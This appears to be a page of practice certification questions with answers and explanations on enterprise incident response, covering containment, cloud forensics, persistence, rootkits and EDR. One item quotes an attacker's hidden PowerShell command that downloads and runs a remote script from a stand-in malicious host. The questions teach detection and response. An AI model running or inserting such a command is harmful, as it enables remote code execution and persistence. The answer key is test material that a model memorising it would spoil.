Courseiva

CCNA Enterprise Environment Incident Response Questions

44 questions · Enterprise Environment Incident Response topic · All types, answers revealed

1
MCQmedium

During an enterprise incident, your team identifies that an attacker has deployed a ransomware variant that encrypts files on a critical file server. The attacker also exfiltrated sensitive data before encryption. Which of the following best describes the appropriate containment strategy?

A.Isolate the file server from the network by disabling its network interface and then restore from the most recent backup.
B.Shut down the file server immediately to stop the encryption process and prevent the attacker from accessing any further data.
C.Immediately disconnect the file server from the network, preserve volatile memory, and then proceed with eradication and recovery after scoping the full extent of the compromise.
D.Leave the server online to monitor the attacker's activity and gather more intelligence, while blocking outbound traffic to known command-and-control servers.
AnswerC

This approach correctly prioritizes containment (disconnecting the server) to stop further encryption and potential lateral movement, while also preserving volatile evidence (memory) for forensic analysis. It acknowledges the need to scope the incident before eradication and recovery, which is critical because the attacker may have compromised other systems or established persistence. This aligns with best practices for handling a ransomware incident with data exfiltration.

Why this answer

The correct approach is to contain the incident by disconnecting the server to stop further encryption and potential lateral movement, while preserving volatile memory for forensic analysis. It is essential to scope the full extent of the compromise before eradication and recovery, as the attacker may have other footholds. This balanced approach aligns with incident response best practices for ransomware with data exfiltration.

Exam trap

The trap here is assuming that shutting down the server is the best way to stop encryption, but that destroys volatile evidence and may hinder recovery.

2
MCQmedium

Refer to the exhibit. An attacker attempts to use a compromised identity with this policy to modify a file in the 'sensitive-data' bucket. What is the expected outcome?

A.The request is denied by the service.
B.The request is successful due to default wide permissions.
C.The request is successful because the resource is a bucket wildcard.
D.The request is denied only if MFA is enabled.
AnswerA

The policy only contains 's3:GetObject', which is a read-only permission. Any attempt to modify data requires 's3:PutObject' or similar write permissions. Since the policy does not include these, the AWS service will return an 'Access Denied' error for the unauthorized modification attempt, preventing the attacker from altering the files.

Why this answer

The IAM policy explicitly grants the 's3:GetObject' permission, which allows reading files but not modifying them. Because IAM policies follow the principle of least privilege and default to deny, any action not explicitly granted—such as 's3:PutObject' or 's3:DeleteObject'—will be denied. This is crucial for responders to understand, as it confirms that the attacker's write-based actions were blocked, potentially limiting the impact to data exfiltration rather than data tampering.

Exam trap

Candidates often assume that if a user has access to a bucket, they can modify its contents. They overlook that specific IAM actions are granular and must be explicitly permitted.

3
Multi-Selecthard

Which THREE activities are considered best practices when preserving evidence from a cloud-based environment during an incident?

Select 3 answers
A.Take snapshots of all attached volumes for forensic imaging.
B.Capture volatile memory using cloud-native imaging tools.
C.Shut down the instance immediately to stop the attack.
D.Isolate the instance using security group rules.
E.Delete all ephemeral logs to save on cloud storage costs.
AnswersA, B, D

Snapshots provide a point-in-time, read-only copy of the disk data. This is a forensically sound way to preserve evidence without affecting the live production system. It ensures that the state of the evidence remains static, allowing responders to conduct detailed analysis without the risk of contaminating the original data.

Why this answer

Evidence preservation in cloud environments requires non-destructive methods that maintain chain of custody while ensuring data integrity. By creating snapshots, isolating the affected instance, and extracting memory, responders ensure that the state of the system is preserved for deep forensic analysis. These steps are crucial because cloud instances are ephemeral and can be easily deleted or modified, which would destroy the evidence necessary to build a complete incident timeline and identify the root cause.

Exam trap

Candidates often suggest deleting the instance to prevent further damage. This destroys volatile evidence; isolation and snapshotting are the correct non-destructive methods for cloud forensics.

4
Multi-Selectmedium

When investigating a suspected data exfiltration incident, which TWO sources are most useful for determining the volume and destination of the transferred data?

Select 2 answers
A.Application performance monitoring (APM) logs.
B.Network flow (NetFlow) logs.
C.Endpoint antivirus event logs.
D.Firewall connection logs.
E.Active Directory authentication logs.
AnswersB, D

NetFlow provides a detailed record of network traffic, including source and destination IP addresses, ports, and, most importantly, the byte count for each flow. This makes it an ideal source for calculating the exact volume of data exfiltrated and identifying where that traffic was directed across the network boundary.

Why this answer

Firewall logs and NetFlow data are the most reliable sources for quantifying data exfiltration. Firewall logs provide information about the connections made, while NetFlow provides the volume of data transferred between specific source and destination IPs. By analyzing these, an analyst can pinpoint the exact amount of data that left the network and where it was sent, which is crucial for reporting the incident's impact and determining the nature of the breached data.

Exam trap

Candidates often select host-based logs like file access or process execution logs, which track local activity but fail to provide the external destination IP and total bytes transferred.

5
MCQmedium

Refer to the exhibit. An investigator observes the listed network connections on a compromised server. Which process warrants immediate investigation based on these connections?

A.The process with PID 4.
B.The process with PID 4820.
C.The connection to 10.10.1.5.
D.The SMB connection on port 445.
AnswerB

PID 4820 is initiating an outbound connection to 203.0.113.45 on port 443. This behavior is characteristic of command-and-control (C2) traffic, where a compromised host reaches out to an external server. Investigating this process is the most logical step to identify the malicious payload and determine the extent of the compromise.

Why this answer

The exhibit shows two active connections. The first is a standard SMB connection, but the second, PID 4820, connects to an external IP on port 443. This is highly suspicious for a server that should not have direct outbound HTTPS communication to an unknown external host.

Identifying the process associated with PID 4820 allows the analyst to trace the activity back to the binary responsible for the unauthorized external communication, which is a key indicator of C2 traffic.

Exam trap

Candidates often struggle to identify the correct PID when multiple connections are listed. They fail to distinguish between standard internal traffic and anomalous external traffic, choosing the wrong process for investigation.

6
MCQmedium

An attacker is using a living-off-the-land (LotL) technique to execute commands on a Linux server. Which log source is most likely to reveal the command-line arguments used?

A.Syslog (/var/log/syslog).
B.Linux Audit Framework (auditd).
C.Apache Access Logs.
D.X11 Display Logs.
AnswerB

The Linux Audit Framework is designed to record system calls, including the 'execve' system call. This allows it to capture the exact command-line arguments passed to any binary, providing a detailed record of what an attacker did. This level of detail is essential for identifying LotL activity on Linux hosts.

Why this answer

Linux auditd is the most robust tool for capturing process execution details. By configuring auditd to watch the 'execve' system call, responders can log every command executed, including its arguments, by every user on the system. This is invaluable during an incident because LotL techniques often use standard, trusted binaries to perform malicious acts, and command-line arguments are the only evidence distinguishing legitimate administrative use from an attacker's malicious actions.

Exam trap

Candidates frequently select Bash history, forgetting it is easily cleared or disabled by attackers. Auditd is the system-level standard that captures execution regardless of user-space shell configuration.

7
MCQmedium

Why is it important to include non-security personnel, such as legal counsel and HR, in the incident response process for a significant data breach?

A.They provide technical expertise needed to reverse engineer the malware.
B.They provide necessary oversight to ensure the company remains compliant with regulations.
C.They are required to manually approve all firewall changes in the network.
D.They are responsible for conducting the forensic investigation of the servers.
AnswerB

Data breaches trigger strict regulatory obligations, such as GDPR or HIPAA notifications. Legal counsel is essential to navigate these requirements, ensuring that the company fulfills its disclosure duties correctly and in a timely manner. HR is necessary if employee discipline or internal policy enforcement becomes a component of the response.

Why this answer

Large-scale data breaches have profound legal and regulatory implications that go far beyond technical remediation. Legal counsel ensures the organization meets mandatory disclosure timelines and manages liability, while HR manages the human element, especially if the breach involved insider threats or required employee-related actions. Their involvement ensures the organization stays compliant with the law and minimizes organizational risk, which is just as vital as the technical work of stopping the attacker.

Exam trap

Candidates incorrectly assume breach response is purely technical, neglecting the mandatory legal compliance, regulatory notification timelines, and HR oversight required during major incidents.

8
MCQhard

An incident responder is investigating a compromised Windows system and finds that the attacker used a technique known as 'process hollowing' to hide malicious code. Which of the following best describes how process hollowing works?

A.The attacker injects malicious code into a running process by using remote thread creation, without replacing the entire process image.
B.The attacker exploits a vulnerability in a legitimate process to execute arbitrary code within its context, without modifying its memory.
C.The attacker creates a new process in a suspended state, replaces its memory with malicious code, and then resumes the process.
D.The attacker uses a scheduled task to execute a malicious script that masquerades as a legitimate system process.
AnswerC

Process hollowing involves creating a legitimate process in a suspended state, unmapping its memory, writing malicious code into the address space, and then resuming the process. This makes the malicious code appear to run under a legitimate process name, evading detection. The responder should look for discrepancies between the process's image on disk and its in-memory content, often using memory forensics tools like Volatility.

Why this answer

Process hollowing is a technique where an attacker creates a legitimate process in a suspended state, replaces its memory with malicious code, and then resumes it. This allows the malicious code to run under the guise of a trusted process, making it harder to detect. Memory forensics can reveal inconsistencies between the on-disk executable and the in-memory image.

Exam trap

The trap here is confusing process hollowing with other code injection techniques like remote thread injection or DLL injection, which do not involve replacing the entire process image.

9
MCQhard

An incident responder is analyzing a compromised Windows server and suspects that an attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with a trigger set to run every hour. The task's action is 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/script.ps1')"'. Which of the following best describes the attacker's technique?

A.The attacker is using a scheduled task to run a PowerShell script that is already stored locally on the server, which indicates a previous compromise.
B.The attacker is using a scheduled task to run a PowerShell script that is signed by a trusted publisher, which bypasses application whitelisting.
C.The attacker is using a scheduled task to execute a PowerShell script that is embedded in the task's action, which is a form of obfuscation.
D.The attacker is using a scheduled task to download and execute a PowerShell script from a remote server, which is a form of fileless malware and persistence.
AnswerD

This option correctly identifies the technique: a scheduled task that runs a hidden PowerShell command to download and execute a remote script. This is fileless because the payload is not written to disk, and it provides persistence by running hourly. The use of 'IEX' (Invoke-Expression) and Net.WebClient is a common pattern for fileless attacks. The responder should investigate the remote server and check for other persistence mechanisms.

Why this answer

The scheduled task runs a hidden PowerShell command that downloads and executes a remote script using Invoke-Expression. This is a fileless persistence technique because the payload is not written to disk and the task ensures recurring execution. The responder should treat this as a serious compromise, investigate the remote URL, and check for similar tasks on other systems.

Exam trap

The trap here is assuming that the PowerShell script is stored locally or embedded in the task, when it is actually downloaded from a remote server.

10
MCQhard

An enterprise incident responder is analyzing a compromised Windows 10 workstation. The attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with the action 'C:\Windows\Temp\svchost.exe'. However, the file svchost.exe is not present in that directory. Which of the following best explains why the task still appears and what should the responder do next?

A.The task is likely a legitimate Windows component; svchost.exe in Temp is normal. The responder should ignore it.
B.The task is a ghost entry; it will be removed after a reboot. No further action is needed.
C.The task was created by a Group Policy Object (GPO); it will be recreated on next policy refresh. The responder should check GPOs.
D.The file may have been deleted by the attacker or antivirus; the task definition remains in the registry and should be examined and removed if malicious.
AnswerD

Scheduled tasks are defined in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache and also have corresponding files in System32\Tasks. Even if the executable is missing, the task definition persists. The attacker might have deleted the file to evade detection, or antivirus may have quarantined it. The responder should examine the task's XML definition, check for related registry keys, and remove the task if it is malicious to eliminate persistence.

Why this answer

Scheduled tasks persist in the registry and on disk even if the referenced executable is missing. The attacker may have deleted the executable to hinder analysis, but the task definition remains and can be used to re-establish persistence if the file is restored. The responder must examine the task's XML, registry entries, and creation time, then remove it if malicious.

This ensures the persistence mechanism is fully eradicated.

Exam trap

The trap here is assuming that a scheduled task with a missing executable is automatically harmless or will self-remove.

11
Multi-Selectmedium

An enterprise incident response team is preparing to conduct a forensic investigation on a compromised Linux server. The server is still running and cannot be taken offline. Which TWO of the following commands are appropriate for collecting volatile network connection information while minimizing disruption to the system? (Choose two.)

Select 2 answers
A.nmap -sS 127.0.0.1
B.netstat -antp
C.lsof -i
D.ss -tulpn
E.tcpdump -i any -w capture.pcap
AnswersB, D

netstat -antp displays active network connections, including TCP and UDP, with process IDs and program names. It is a standard tool for live response and provides a snapshot of current connections. Using the -p flag requires root privileges but is appropriate for forensic collection on a running system without causing disruption.

Why this answer

netstat and ss are standard tools for capturing volatile network connection information on a live Linux system. Both provide details on active connections, listening ports, and associated processes without generating new traffic or causing significant system disruption. They are commonly used in incident response to document the current network state before further analysis.

Exam trap

The trap here is confusing network capture tools like tcpdump with connection enumeration tools, but tcpdump records packets rather than listing current connections with process attribution.

12
MCQmedium

During an enterprise incident, you discover that an attacker modified the Windows event log service to record only selected events, effectively hiding malicious activity. Which Windows artifact should you analyze first to determine what modifications were made to the logging configuration?

A.The SYSTEM registry hive, specifically the EventLog service key.
B.The NTFS $LogFile for the volume containing the event logs.
C.The Application event log for service control manager events.
D.The Security event log (EVTX) for event ID 1102.
AnswerA

The EventLog service configuration, including which logs are enabled and their file paths, is stored in the SYSTEM registry hive under CurrentControlSet\Services\EventLog. Analyzing this key reveals if an attacker disabled logging or redirected log files. This is the authoritative source for logging configuration changes and should be examined early in the investigation to understand the scope of tampering.

Why this answer

The EventLog service configuration is stored in the SYSTEM registry hive, making it the definitive source for determining if an attacker altered logging settings. Other artifacts like event logs themselves or file system metadata may provide indirect clues, but they do not contain the configuration details needed to identify what was changed. Examining the SYSTEM hive allows responders to see exactly which logs were enabled or disabled.

Exam trap

The trap here is assuming that clearing the Security event log (event ID 1102) is the only way attackers tamper with logging, when in fact they often modify registry-based logging configuration to selectively suppress events.

13
MCQhard

An organization discovers that an attacker is using 'Living off the Land' (LotL) binaries to execute malicious code. Why are LotL attacks particularly difficult to detect in an enterprise environment?

A.The tools are specifically designed by attackers to bypass security.
B.They operate entirely in memory and leave no file system artifacts.
C.They utilize trusted system processes that are frequently used by administrators.
D.The attacker encrypts the binaries so antivirus cannot scan them.
AnswerC

LotL attacks abuse legitimate tools such as PowerShell or WMI that are already trusted by the OS and security software. Since administrators use these same tools for daily tasks, it is difficult to identify which executions are malicious without advanced behavioral analysis that correlates multiple logs and process metadata.

Why this answer

LotL attacks utilize legitimate, pre-installed system tools like PowerShell, WMI, or Certutil to execute malicious payloads. Because these tools are trusted and frequently used for legitimate administrative tasks, they often bypass traditional signature-based antivirus or allowlisting solutions. Detecting these requires sophisticated behavioral analysis, such as looking for anomalous command-line flags, unusual process ancestry, or unexpected execution patterns, which are significantly harder to differentiate from routine administrative activity compared to detecting known malicious malware binaries.

Exam trap

Many candidates focus on the 'maliciousness' of the binary itself rather than the context of the execution. The trap is assuming that the binary is inherently blocked, ignoring that LotL tools are legitimate and trusted.

14
MCQhard

During an incident response engagement, you discover that an attacker has compromised a Windows server and established persistence by creating a new Windows service. The service is configured to run a malicious executable at system startup. Which of the following registry locations would you examine to find the configuration of this service?

A.HKLM\SYSTEM\CurrentControlSet\Services
B.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
C.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
AnswerA

This registry key contains subkeys for each installed service. Each service subkey includes values such as ImagePath, which points to the executable, and Start, which defines when the service starts. Examining this key will reveal the malicious service's configuration, including the path to the malicious executable.

Why this answer

Windows services are configured in the registry under HKLM\SYSTEM\CurrentControlSet\Services. Each service has its own subkey containing values like ImagePath, which specifies the executable to run, and Start, which determines the start type. Investigating this key allows you to identify malicious services and their executables.

Exam trap

The trap here is confusing service persistence with Run key persistence, but services are stored in the SYSTEM hive under CurrentControlSet\Services, not in the SOFTWARE hive's Run keys.

15
MCQhard

During a response to an incident involving a web shell, you find that the attacker is using custom encoding to bypass WAF signatures. What is the best forensic approach to identify all impacted web files?

A.Run a regex-based search for common web shell function names.
B.Perform a file integrity check against the original source code base.
C.Analyze WAF logs to identify all requests that resulted in 200 OK codes.
D.Examine the access logs for all requests containing encoded characters.
AnswerB

Comparing the current web directory against a trusted source control baseline is the most effective way to detect unauthorized modifications. By identifying every added, deleted, or modified file, you can isolate the web shells regardless of their obfuscation, as any unauthorized change is inherently suspicious in a production environment.

Why this answer

When attackers use custom encoding to hide web shells, signature-based WAF detections are ineffective. The most robust method is to perform a differential analysis of the web application's codebase against a known-good baseline, such as the original source control repository. By automatically highlighting differences, you can identify injected code blocks that don't match authorized files, regardless of how they are encoded or obfuscated by the attacker during the injection process.

Exam trap

Candidates often choose WAF log analysis, assuming the WAF will catch all attempts. However, custom encoding bypasses signatures, making file-level integrity checking the only reliable way to detect injected code.

16
Multi-Selectmedium

During an enterprise incident response, you are tasked with collecting volatile evidence from a compromised Windows workstation. Which two of the following are considered best practices for preserving volatile data? (Choose two.)

Select 2 answers
A.Immediately shut down the system to prevent further malicious activity and then create a forensic image of the hard drive.
B.Use a write blocker when connecting the hard drive to a forensic workstation to create a bit-for-bit image.
C.Run 'netstat -ano' to record active network connections and associated process IDs.
D.Capture the contents of physical memory (RAM) using a forensic tool before shutting down the system.
E.Disconnect the workstation from the network before capturing any volatile data to prevent data leakage.
AnswersC, D

Running netstat captures current network connections and listening ports, along with the process IDs. This is valuable for identifying command-and-control connections and lateral movement. It is a quick, non-intrusive command that should be run early in the collection process. The output can be correlated with process listings and memory analysis to understand the attacker's network activity. It is a best practice to document these connections before they change.

Why this answer

Capturing physical memory and recording active network connections are both essential for preserving volatile evidence. Memory contains running processes, encryption keys, and injected code, while netstat reveals current network activity that may indicate command-and-control or lateral movement. These steps should be performed before any action that alters the system state, such as shutdown or disconnection.

Exam trap

The trap here is thinking that shutting down the system or disconnecting it from the network is a safe first step, but that destroys volatile evidence.

17
MCQmedium

An organization is deploying an EDR solution to improve incident response capabilities. What is the most critical factor to consider when configuring EDR policies for a production environment?

A.Ensuring the EDR agent is configured to delete all suspicious files automatically.
B.Balancing security posture with the risk of operational impact.
C.Forcing all EDR logs to be stored in the cloud for infinite retention.
D.Disabling all other security tools to prevent agent conflict.
AnswerB

Production environments require high availability. An EDR policy that is too aggressive might block legitimate processes, leading to critical service downtime. Balancing security with operational stability through testing and monitoring is the most important factor to ensure the EDR adds value without negatively impacting core business productivity.

Why this answer

EDR policies must be carefully tuned to prevent false positives that can lead to system instability, such as inadvertently blocking critical business processes or causing performance degradation. In production, an 'alert-only' mode is often implemented first to gather data and validate the impact. Without proper testing and tuning, a overly aggressive EDR configuration can disrupt legitimate operations, causing more damage to business productivity than the threats the EDR is intended to mitigate.

Exam trap

Candidates frequently choose aggressive blocking postures, underestimating the business disruption caused by false positives when deploying security controls in sensitive production environments.

18
Multi-Selecthard

An organization detects a sophisticated adversary attempting to move laterally using Pass-the-Hash (PtH) techniques. Which THREE of the following configurations or practices are most effective at mitigating this risk?

Select 3 answers
A.Enable Credential Guard on all workstations and servers.
B.Disable NTLM authentication and force Kerberos usage.
C.Implement Local Administrator Password Solution (LAPS).
D.Increase the minimum password length requirement to 20 characters.
E.Regularly scan for and remove all local user accounts.
AnswersA, B, C

Credential Guard uses virtualization-based security to isolate secrets in a protected container. By preventing access to the LSA process memory, it stops attackers from extracting NTLM hashes or Kerberos tickets, which are the fundamental building blocks for Pass-the-Hash and Pass-the-Ticket attacks, significantly hardening the host against lateral movement.

Why this answer

Pass-the-Hash exploits the way NTLM stores password hashes in memory. By limiting the scope of where privileged accounts can authenticate and restricting the use of legacy protocols like NTLM in favor of Kerberos, organizations can significantly shrink the attack surface. Implementing Credential Guard provides an additional layer of hardware-based isolation that prevents the extraction of these hashes from memory, effectively neutralising the primary mechanism that attackers rely on for lateral movement within a domain.

Exam trap

Candidates often pick only one or two options and miss the requirement for a comprehensive approach. They may forget LAPS, which is critical for preventing lateral movement via local admin credential reuse.

19
Multi-Selecthard

An organization is deploying an EDR solution across a hybrid environment. Which TWO of the following tasks are critical for ensuring effective incident response visibility?

Select 2 answers
A.Excluding all antivirus-flagged files from the EDR scanning scope.
B.Configuring full-stack telemetry collection across all managed endpoints.
C.Defining and testing automated containment playbooks for high-severity alerts.
D.Disabling kernel-mode auditing to improve endpoint performance metrics.
E.Restricting data retention to 24 hours to comply with privacy regulations.
AnswersB, C

Full-stack telemetry—including process creation, network connections, registry changes, and file system modifications—is essential for reconstructing an attacker's timeline. Without this data, responders lack the context needed to identify lateral movement or command-and-control communication, rendering the EDR tool ineffective at providing a comprehensive picture of the incident's scope.

Why this answer

Successful EDR deployment requires both technical configuration and operational integration. Ensuring comprehensive coverage across all endpoints prevents blind spots where attackers can hide, while defining automated response playbooks allows the IR team to scale their efforts during high-velocity incidents. These tasks are foundational to reducing mean time to respond, as they ensure high-fidelity telemetry is available and actionable, allowing for rapid containment of threats before they escalate across the enterprise network.

Exam trap

Candidates focus exclusively on threat intelligence feeds or endpoint isolation tools, ignoring the foundational requirement for comprehensive telemetry collection and tested playbooks.

20
MCQhard

During an enterprise incident response, you are examining a compromised Windows system and suspect the attacker used a rootkit to hide a malicious service. You have obtained a memory image and a disk image. Which of the following techniques is most effective for detecting a hidden service that is not visible through standard API calls?

A.Analyzing the memory image for service records using a tool like Volatility.
B.Running a full antivirus scan with updated signatures.
C.Enumerating services using the Services.msc GUI.
D.Comparing the output of 'sc query' with the service list from the registry.
AnswerA

Memory forensics tools like Volatility can parse kernel data structures to enumerate services directly from memory, bypassing any API hooks or registry modifications. By examining the service list in memory, you can detect services that are hidden from user-mode APIs. This is the most effective method for identifying rootkit-hidden services, as it relies on the actual state of the system rather than potentially compromised interfaces.

Why this answer

Rootkits often hook user-mode APIs to hide their presence, so tools that rely on those APIs (like Services.msc or sc query) may not show the malicious service. Memory forensics tools like Volatility directly parse kernel structures such as the service list, which are harder for rootkits to manipulate without causing instability. This allows detection of services that are hidden from standard interfaces.

Antivirus may also be bypassed, making memory analysis the most effective approach.

Exam trap

The trap here is trusting user-mode API outputs like Services.msc or sc query, which can be manipulated by a rootkit.

21
MCQmedium

An incident responder is reviewing EDR alerts and discovers an 'Account Manipulation' event. What is the most common reason why an attacker would target the 'Domain Admins' group during the post-exploitation phase?

A.To bypass the need for multi-factor authentication on local machines.
B.To gain unrestricted control over the entire domain and its resources.
C.To encrypt the Active Directory database for ransomware demands.
D.To hide their tracks by clearing the Windows Event logs globally.
AnswerB

Domain Admin is the most powerful privilege level in a Windows domain. By successfully compromising this group, an attacker inherits the ability to perform any action on any object within the domain, effectively giving them complete authority to manipulate resources, settings, and user access across the whole enterprise network.

Why this answer

Targeting the Domain Admins group is the 'holy grail' for an attacker because it provides full control over the entire Active Directory domain. With these privileges, an attacker can disable security controls, create new accounts, exfiltrate sensitive data, and install persistent backdoors across all systems joined to the domain. This level of access effectively grants the attacker the ability to operate undetected and exert complete influence over the organization's enterprise infrastructure.

Exam trap

Candidates often confuse the goal of 'Domain Admins' targeting with specific technical outcomes like 'credential dumping' or 'data exfiltration', missing that these are simply intermediate methods to achieve the primary goal of total domain control.

22
MCQmedium

During an enterprise-wide incident response, a Windows workstation is suspected of being compromised by a threat actor who used a spear-phishing document. The machine is still powered on and the user is logged in. You need to capture volatile evidence in a forensically sound manner. Which of the following is the correct order of volatility for collecting evidence, from most volatile to least volatile?

A.Temporary file systems, disk, RAM, routing table, CPU registers and cache
B.CPU registers and cache, routing table, RAM, temporary file systems, disk
C.Disk, RAM, temporary file systems, routing table, CPU registers and cache
D.RAM, CPU registers and cache, disk, temporary file systems, routing table
AnswerB

This order correctly follows the RFC 3227 guidelines for order of volatility. CPU registers and cache are the most volatile, followed by routing tables, ARP cache, process table, kernel statistics, and memory. Temporary file systems and disk are less volatile. Collecting in this order minimizes loss of critical evidence that disappears when the system is powered down.

Why this answer

The order of volatility dictates that the most perishable evidence be collected first. CPU registers and cache change with every instruction, routing tables and ARP caches expire quickly, and RAM loses its contents on power-off. Temporary file systems and disk are comparatively persistent.

Following this sequence preserves the most fragile evidence before it is altered or destroyed by normal system activity or shutdown.

Exam trap

The trap here is assuming that RAM is always the most volatile component, when CPU registers and cache are even more volatile and are often overlooked.

23
MCQmedium

During a cloud-based incident, you determine that an attacker has gained access to an IAM role with excessive permissions. What is the most effective containment step to minimize the blast radius without causing immediate service outages?

A.Delete the IAM role immediately.
B.Attach an inline policy to deny all actions for the compromised role.
C.Change the password for the root user account.
D.Disable the entire cloud subscription or account.
AnswerB

Attaching a 'Deny All' policy is the most effective way to neutralize the compromised role instantly. Because explicit denies always override allows in IAM, the attacker loses the ability to execute any commands, while the role itself remains in the cloud configuration for forensic investigation and audit purposes.

Why this answer

In cloud environments, the most precise way to contain an identity-based attack is to apply an inline policy to the compromised role that explicitly denies all actions, or to revoke the active session tokens. By narrowing the scope of permissions or invalidating current credentials, responders can prevent the attacker from performing further unauthorized API calls while allowing legitimate, non-impacted services to continue functioning correctly within the environment.

Exam trap

Candidates often choose to delete the entire IAM role or disable the root account, causing catastrophic service outages rather than applying targeted containment.

24
MCQmedium

Which phase of the incident response lifecycle is most directly responsible for ensuring that an enterprise environment is returned to a secure, verified state after an intrusion?

A.Identification
B.Containment
C.Recovery
D.Lessons Learned
AnswerC

Recovery is the phase where systems are restored, patches are applied, and security controls are validated to ensure the environment is safe for business operations. This step ensures that the root cause is addressed and that no residual access or persistence mechanisms remain that could allow the adversary to regain control.

Why this answer

The recovery phase is where the focus shifts from stopping the bleeding to restoring business operations securely. This involves verifying that all backdoors have been closed, credentials have been rotated, and systems are patched against the initial vulnerability used by the attacker. Without rigorous verification in this phase, the enterprise remains vulnerable to reinfection, as attackers often leave dormant persistence mechanisms that can be triggered if the remediation is not thorough.

Exam trap

Candidates often choose 'Remediation' or 'Eradication' as the phase for returning to a secure state. While those are involved, 'Recovery' is the formal phase defined by ensuring business operations are restored securely.

25
Multi-Selectmedium

An incident responder is investigating a compromised Windows server. The attacker gained access via a Remote Desktop Protocol (RDP) brute-force attack and then created a new local user account for persistence. The responder needs to identify evidence of the newly created account and any subsequent logon activity. Which TWO of the following Windows artifacts should the responder examine to find this evidence? (Choose two.)

Select 2 answers
A.Application event log (Event ID 1000)
B.SAM registry hive
C.Security event log (Event ID 4720 and 4624)
D.System event log (Event ID 7045)
E.Prefetch files
AnswersB, C

The SAM registry hive stores local user account information, including usernames, password hashes, and account creation dates. Analyzing the SAM hive can reveal the presence of the newly created local account, even if event logs have been cleared. It provides a persistent record of the account's existence and attributes.

Why this answer

The Security event log records account creation (4720) and logon events (4624), providing a timeline of the attacker's actions. The SAM registry hive stores the local account database, including the new account's details, and can be analyzed even if logs are cleared. Together, they offer direct evidence of the new account and its use, which is critical for understanding the persistence mechanism.

Exam trap

The trap here is assuming that any log mentioning account activity is sufficient, while overlooking that the SAM hive provides persistent account data even if event logs are cleared.

26
MCQmedium

Which of the following describes the 'Principle of Least Privilege' applied to incident response accounts?

A.Using a Domain Admin account for all investigation tasks to avoid access issues.
B.Granting forensic responders full system access to all network segments.
C.Limiting IR account access to only the specific data and systems needed for the investigation.
D.Ensuring all IR accounts have a shared password for rapid response coordination.
AnswerC

By limiting the permissions of an IR account to exactly what is needed—such as log reading or forensic disk access—the organization mitigates the risk of credential theft. This practice ensures that even if an account is compromised, the attacker is limited in their ability to escalate or expand their foothold.

Why this answer

Using dedicated, limited-scope accounts for incident response ensures that if the responder's account is compromised, the attacker does not gain enterprise-wide administrative access. By providing only the permissions necessary for the investigation—such as read-only access to logs or forensic imaging permissions—the risk of accidental or malicious damage to the production environment is minimized, ensuring that the integrity of the IR process remains intact even in a hostile or complex environment.

Exam trap

Candidates often interpret 'Least Privilege' as 'using a regular user account'. In an IR context, it means providing the absolute minimum access required for the specific forensic task, not just 'low' access.

27
MCQhard

An enterprise incident responder is analyzing a compromised Linux server. The attacker used a rootkit that hooks system calls to hide processes and files. Which forensic technique is most effective to detect the rootkit's presence and identify hidden processes?

A.Run chkrootkit and rkhunter to scan for known rootkit signatures.
B.Inspect the output of netstat -tulpn for unusual listening ports.
C.Use Volatility to analyze a memory dump for hidden processes.
D.Compare the output of ps and /proc directory listings.
AnswerD

A system call hooking rootkit often manipulates the output of tools like ps by intercepting system calls. However, the /proc file system is maintained by the kernel and may still contain entries for hidden processes. Comparing ps output with the contents of /proc can reveal discrepancies where processes exist in /proc but are not shown by ps, indicating rootkit activity.

Why this answer

A system call hooking rootkit often intercepts system calls used by tools like ps, causing them to omit hidden processes. The /proc file system, however, is generated by the kernel and may still list all processes. By comparing the process list from ps with the directory entries in /proc, an investigator can identify processes that are present in /proc but missing from ps, indicating rootkit manipulation.

This technique is a classic method for detecting user-mode rootkits.

Exam trap

The trap here is relying solely on signature-based rootkit scanners, which may fail against custom rootkits, instead of using a direct comparison method that exposes kernel-level discrepancies.

28
MCQmedium

During an enterprise incident response, you need to collect volatile evidence from a compromised Windows server that is still powered on. The server is business-critical and cannot be taken offline. Which of the following is the most appropriate order for collecting volatile data, according to RFC 3227 guidelines?

A.Collect network connections, then disk, then memory, then running processes.
B.Collect the disk image first to preserve the most evidence, then memory, then network connections.
C.Collect the contents of physical memory, then network connections, then running processes, then disk.
D.Collect running processes, then disk, then memory, then network connections.
AnswerC

RFC 3227 specifies order of volatility: memory and network state are more volatile than process table and disk. Collecting memory first preserves the most perishable evidence. Network connections and running processes change rapidly, but memory is lost entirely upon shutdown, so it must be captured before other artifacts. Disk is least volatile and can be collected later.

Why this answer

The order of volatility dictates that the most perishable evidence be collected first. Physical memory and network connections are extremely volatile; running processes are less so but still change; disk is least volatile. Therefore, memory should be captured first, followed by network connections, then processes, and finally disk.

This minimizes loss of evidence.

Exam trap

The trap here is assuming that disk imaging should be prioritized because it captures the most data, but volatile evidence like memory and network state can be lost forever if not collected first.

29
MCQhard

An incident responder is analyzing a compromised Windows 10 workstation. The attacker used a technique to execute code in the context of a legitimate process by injecting a malicious DLL into it. Which of the following Windows artifacts would BEST provide evidence of this specific technique?

A.Memory dumps of the injected process
B.Windows Event Logs (Security.evtx)
C.Shimcache
D.Prefetch files
AnswerA

Memory dumps of the injected process can reveal the presence of the malicious DLL in the process's address space. Tools like Volatility's malfind or dlllist can detect injected code by looking for memory regions with unusual permissions or unlinked DLLs. This is the most direct evidence of DLL injection.

Why this answer

DLL injection leaves artifacts in the memory of the target process. Analyzing a memory dump with forensic tools can reveal injected DLLs, often by identifying memory regions with executable permissions that are not backed by a file on disk, or by finding DLLs not listed in the process's module list. This provides direct evidence of the technique.

Exam trap

The trap here is assuming that execution artifacts like Prefetch or Shimcache would show the malicious DLL, but they only track executable files, not injected code within another process.

30
MCQmedium

During an enterprise incident response, you need to triage a compromised Windows host to determine if an adversary established persistence via a malicious service. Which artifact should you examine first to identify the service name, binary path, and start type?

A.The SYSTEM registry hive, specifically the Services key under CurrentControlSet
B.The Windows Event Log Security.evtx for event ID 4697
C.The SOFTWARE registry hive, specifically the Microsoft\Windows\CurrentVersion\Run key
D.The NTFS $MFT to identify recently created executable files in System32
AnswerA

